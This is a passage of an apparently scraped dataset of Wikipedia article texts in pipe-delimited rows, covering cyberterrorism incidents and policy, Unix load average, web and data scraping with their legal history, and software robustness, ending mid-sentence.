Surf Safe Pakistan 65 is one such example. Now people in Pakistan can report extremist and terrorist related content online on Surf Safe Pakistan portal. The National Counter Terrorism Authority (NACTA) provides the Federal Government's leadership for the Surf Safe Campaign. A series of powerful cyber attacks began 27 June 2017, that swamped websites of Ukrainian organizations, including banks, ministries, newspapers and electricity firms. The US Department of Defense (DoD) charged the United States Strategic Command with the duty of combating cyberterrorism. This is accomplished through the Joint Task Force-Global Network Operations, which is the operational component supporting USSTRATCOM in defense of the DoD's Global Information Grid. This is done by integrating GNO capabilities into the operations of all DoD computers, networks, and systems used by DoD combatant commands, services and agencies. On 2 November 2006, the Secretary of the Air Force announced the creation of the Air Force's newest MAJCOM, the Air Force Cyber Command, which would be tasked to monitor and defend American interest in cyberspace. The plan was however replaced by the creation of Twenty-Fourth Air Force which became active in August 2009 and would be a component of the planned United States Cyber Command. 66 On 22 December 2009, the White House named its head of computer security as Howard Schmidt to coordinate U.S Government, military and intelligence efforts to repel hackers. He left the position in May 2012. 67 Michael Daniel was appointed to the position of White House Coordinator of Cyber Security the same week 68 and continues in the position during the second term of the Obama administration. 69 Obama signed an executive order to enable the US to impose sanctions on either individuals or entities that are suspected to be participating in cyber related acts. These acts were assessed to be possible threats to US national security, financial issues or foreign policy issues. 70 U.S. authorities indicted a man over 92 cyberterrorism hacks attacks on computers used by the Department of Defense. 71 A Nebraska-based consortium apprehended four million hacking attempts in the course of eight weeks. 72 In 2011 cyberterrorism attacks grew 20%. 73 In May 2021, President Joe Biden announced an executive order aiming to improve America's cybersecurity. It came about after an increase in cybersecurity attacks aimed at the country's public and private sector. The plan aims to improve the government's cyberdefense by working on its ability to identify, deter, protect against, detect, and respond to attacks. The plan has 10 sections written into the document that include, to name a few, improving sharing of threat information, modernizing the government's cybersecurity, and establishing a Cybersecurity Review Board. 74 An operation can be done by anyone anywhere in the world, for it can be performed thousands of miles away from a target. An attack can cause serious damage to a critical infrastructure which may result in casualties. 75 Some attacks are conducted in furtherance of political and social objectives, as the following examples illustrate: Non-political acts of sabotage have caused financial and other damage. In 2000, disgruntled employee Vitek Boden caused the release of 800,000 litres of untreated sewage into waterways in Maroochy Shire, Australia. 105 106 More recently, in May 2007 Estonia was subjected to a mass cyber-attack in the wake of the removal of a Russian World War II war memorial from downtown Tallinn. The attack was a distributed denial-of-service attack in which selected sites were bombarded with traffic to force them offline; nearly all Estonian government ministry networks as well as two major Estonian bank networks were knocked offline; in addition, the political party website of Estonia's Prime Minister Andrus Ansip featured a counterfeit letter of apology from Ansip for removing the memorial statue. citation needed In January 2008 a man from Estonia was convicted for launching the attacks against the Estonian Reform Party website and fined. 107 108 During the Russo-Georgian War, on 5 August 2008, three days before Georgia launched its invasion of South Ossetia, the websites for OSInform News Agency and OSRadio were hacked. The OSinform website at osinform.ru kept its header and logo, but its content was replaced by a feed to the Alania TV website content. Alania TV, a Georgian government-supported television station aimed at audiences in South Ossetia, denied any involvement in the hacking of the websites. Dmitry Medoyev, at the time the South Ossetian envoy to Moscow, claimed that Georgia was attempting to cover up information on events which occurred in the lead-up to the war. 109 One such cyber attack caused the Parliament of Georgia and Georgian Ministry of Foreign Affairs websites to be replaced by images comparing Georgian president Mikheil Saakashvili to Adolf Hitler. 110 Other attacks involved denials of service to numerous Georgian and Azerbaijani websites, 111 such as when Russian hackers allegedly disabled the servers of the Azerbaijani Day.Az news agency. 112 In June 2019, Russia has conceded that it is "possible" its electrical grid is under cyber-attack by the United States. 113 The New York Times reported that American hackers from the United States Cyber Command planted malware potentially capable of disrupting the Russian electrical grid. 114 Even more recently, in October 2007, the website of Ukrainian president Viktor Yushchenko was attacked by hackers. A radical Russian nationalist youth group, the Eurasian Youth Movement, claimed responsibility. 115 116 In 1999 hackers attacked NATO computers. The computers flooded them with email and hit them with a denial-of-service attack. The hackers were protesting against the NATO bombings of the Chinese embassy in Belgrade. Businesses, public organizations and academic institutions were bombarded with highly politicized emails containing viruses from other European countries. 117 In December 2018, Twitter warned of "unusual activity" from China and Saudi Arabia. A bug was detected in November that could have revealed the country code of users' phone numbers. Twitter said the bug could have had ties to "state-sponsored actors". 118 119 In May 2021 successive waves of DDOS attacks aimed at Belnet, Belgium's public sector ISP, took down multiple government sites in Belgium. 200 sites were affected leaving public offices, universities, and research centers unable to access the internet fully or partially. 120 Washington DC, 2003 Press, New York, 1999 |
44 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Load_(computing) | In UNIX computing, the system load is a measure of the amount of computational work that a computer system performs. The load average represents the average system load over a period of time. It conventionally appears in the form of three numbers which represent the system load during the last one , five , and fifteen-minute periods. All Unix and Unix-like systems generate a dimensionless metric of three "load average" numbers in the kernel. Users can easily query the current result from a Unix shell by running the uptime command: The w and top commands show the same three load average numbers, as do a range of graphical user interface utilities. In operating systems based on the Linux kernel, this information can be easily accessed by reading the proc loadavg file. To explore this kind of information in depth, according to the Linux's Filesystem Hierarchy Standard, architecture-dependent information are exposed on the file proc stat. 1 2 3 An idle computer has a load number of 0 (the idle process is not counted). Each process using or waiting for CPU (the ready queue or run queue) increments the load number by 1. Each process that terminates decrements it by 1. Most UNIX systems count only processes in the running (on CPU) or runnable (waiting for CPU) states. However, Linux also includes processes in uninterruptible sleep states (usually waiting for disk activity), which can lead to markedly different results if many processes remain blocked in I O due to a busy or stalled I O system. 4 This, for example, includes processes blocking due to an NFS server failure or too slow media (e.g., USB 1.x storage devices). Such circumstances can result in an elevated load average, which does not reflect an actual increase in CPU use (but still gives an idea of how long users have to wait). Systems calculate the load average as the exponentially damped weighted moving average of the load number. The three values of load average refer to the past one, five, and fifteen minutes of system operation. 5 Mathematically speaking, all three values always average all the system load since the system started up. They all decay exponentially, but they decay at different speeds: they decay exponentially by e after 1, 5, and 15 minutes respectively. Hence, the 1 minute load average consists of 63% (more precisely: 1 - 1 e) of the load from the last minute and 37% (1 e) of the average load since start up, excluding the last minute. For the 5 and 15 minute load averages, the same 63% 37% ratio is computed over 5 minutes and 15 minutes, respectively. Therefore, it is not technically accurate that the 1 minute load average only includes the last 60 seconds of activity, as it includes 37% of the activity from the past, but it is correct to state that it includes mostly the last minute. For single-CPU systems that are CPU bound, one can think of load average as a measure of system utilization during the respective time period. For systems with multiple CPUs, one must divide the load by the number of processors in order to get a comparable measure. For example, one can interpret a load average of "1.73 0.60 7.98" on a single-CPU system as: This means that this system (CPU, disk, memory, etc.) could have handled all the work scheduled for the last minute if it were 1.73 times as fast. In a system with four CPUs, a load average of 3.73 would indicate that there were, on average, 3.73 processes ready to run, and each one could be scheduled into a CPU. On modern UNIX systems, the treatment of threading with respect to load averages varies. Some systems treat threads as processes for the purposes of load average calculation: each thread waiting to run will add 1 to the load. However, other systems, especially systems implementing so-called M:N threading, use different strategies such as counting the process exactly once for the purpose of load (regardless of the number of threads), or counting only threads currently exposed by the user-thread scheduler to the kernel, which may depend on the level of concurrency set on the process. Linux appears to count each thread separately as adding 1 to the load. 6 The comparative study of different load indices carried out by Ferrari et al. 7 reported that CPU load information based upon the CPU queue length does much better in load balancing compared to CPU utilization. The reason CPU queue length did better is probably because when a host is heavily loaded, its CPU utilization is likely to be close to 100%, and it is unable to reflect the exact load level of the utilization. In contrast, CPU queue lengths can directly reflect the amount of load on a CPU. As an example, two systems, one with 3 and the other with 6 processes in the queue, are both very likely to have utilizations close to 100%, although they obviously differ. original research? On Linux systems, the load-average is not calculated on each clock tick, but driven by a variable value that is based on the HZ frequency setting and tested on each clock tick. This setting defines the kernel clock tick rate in Hertz (times per second), and it defaults to 100 for 10ms ticks. Kernel activities use this number of ticks to time themselves. Specifically, the timer.c::calc load() function, which calculates the load average, runs every LOAD FREQ (5 HZ 1) ticks, or about every five seconds: The avenrun array contains 1 minute, 5 minute and 15 minute average. The CALC LOAD macro and its associated values are defined in sched.h: The "sampled" calculation of load averages is a somewhat common behavior; FreeBSD, too, only refreshes the value every five seconds. The interval is usually taken to not be exact so that they do not collect processes that are scheduled to fire at a certain moment. 8 A post on the Linux mailing list considers its 1 tick insufficient to avoid Moire artifacts from such collection, and suggests an interval of 4.61 seconds instead. 9 This change is common among Android system kernels, although the exact expression used assumes an HZ of 100. 10 Other commands for assessing system performance include: |
45 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#History | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
46 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Further_reading | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
47 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Robustness_(computer_science) | Collective intelligence Collective action Self-organized criticality Herd mentality Phase transition Agent-based modelling Synchronization Ant colony optimization Particle swarm optimization Swarm behaviour Social network analysis Small-world networks Centrality Motifs Graph theory Scaling Robustness Systems biology Dynamic networks Evolutionary computation Genetic algorithms Genetic programming Artificial life Machine learning Evolutionary developmental biology Artificial intelligence Evolutionary robotics Reaction diffusion systems Partial differential equations Dissipative structures Percolation Cellular automata Spatial ecology Self-replication Conversation theory Entropy Feedback Goal-oriented Homeostasis Information theory Operationalization Second-order cybernetics Self-reference System dynamics Systems science Systems thinking Sensemaking Variety Ordinary differential equations Phase space Attractors Population dynamics Chaos Multistability Bifurcation Rational choice theory Bounded rationality In computer science, robustness is the ability of a computer system to cope with errors during execution 1 2 and cope with erroneous input. 2 Robustness can encompass many areas of computer science, such as robust programming, robust machine learning, and Robust Security Network. Formal techniques, such as fuzz testing, are essential to showing robustness since this type of testing involves invalid or unexpected inputs. Alternatively, fault injection can be used to test robustness. Various commercial products perform robustness testing of software analysis. 3 In general, building robust systems that encompass every point of possible failure is difficult because of the vast quantity of possible inputs and input combinations. 4 Since all inputs and input combinations would require too much time to test, developers cannot run through all cases exhaustively. Instead, the developer will try to generalize such cases. 5 For example, imagine inputting some integer values. Some selected inputs might consist of a negative number, zero, and a positive number. When using these numbers to test software in this way, the developer generalizes the set of all reals into three numbers. This is a more efficient and manageable method, but more prone to failure. Generalizing test cases is an example of just one technique to deal with failure—specifically, failure due to invalid user input. Systems generally may also fail due to other reasons as well, such as disconnecting from a network. Regardless, complex systems should still handle any errors encountered gracefully. There are many examples of such successful systems. Some of the most robust systems are evolvable and can be easily adapted to new situations. 4 Programs and software are tools focused on a very specific task, and thus are not generalized and flexible. 4 However, observations in systems such as the internet or biological systems demonstrate adaptation to their environments. One of the ways biological systems adapt to environments is through the use of redundancy. 4 Many organs are redundant in humans. The kidney is one such example. Humans generally only need one kidney, but having a second kidney allows room for failure. This same principle may be taken to apply to software, but there are some challenges. When applying the principle of redundancy to computer science, blindly adding code is not suggested. Blindly adding code introduces more errors, makes the system more complex, and renders it harder to understand. 6 Code that does not provide any reinforcement to the already existing code is unwanted. The new code must instead possess equivalent functionality, so that if a function is broken, another providing the same function can replace it, using manual or automated software diversity. To do so, the new code must know how and when to accommodate the failure point. 4 This means more logic needs to be added to the system. But as a system adds more logic, components, and increases in size, it becomes more complex. Thus, when making a more redundant system, the system also becomes more complex and developers must consider balancing redundancy with complexity. Currently, computer science practices do not focus on building robust systems. 4 Rather, they tend to focus on scalability and efficiency. One of the main reasons why there is no focus on robustness today is because it is hard to do in a general way. 4 Robust programming is a style of programming that focuses on handling unexpected termination and unexpected actions. 7 It requires code to handle these terminations and actions gracefully by displaying accurate and unambiguous error messages. These error messages allow the user to more easily debug the program. Robust machine learning typically refers to the robustness of machine learning algorithms. For a machine learning algorithm to be considered robust, either the testing error has to be consistent with the training error, or the performance is stable after adding some noise to the dataset. 8 Recently, consistently with their rise in popularity, there has been an increasing interest in the robustness of neural networks. This is particularly due their vulnerability to adverserial attacks. 9 Robust network design is the study of network design in the face of variable or uncertain demands. 10 In a sense, robustness in network design is broad just like robustness in software design because of the vast possibilities of changes or inputs. There exist algorithms that tolerate errors in the input. 11 |
48 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-8 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often 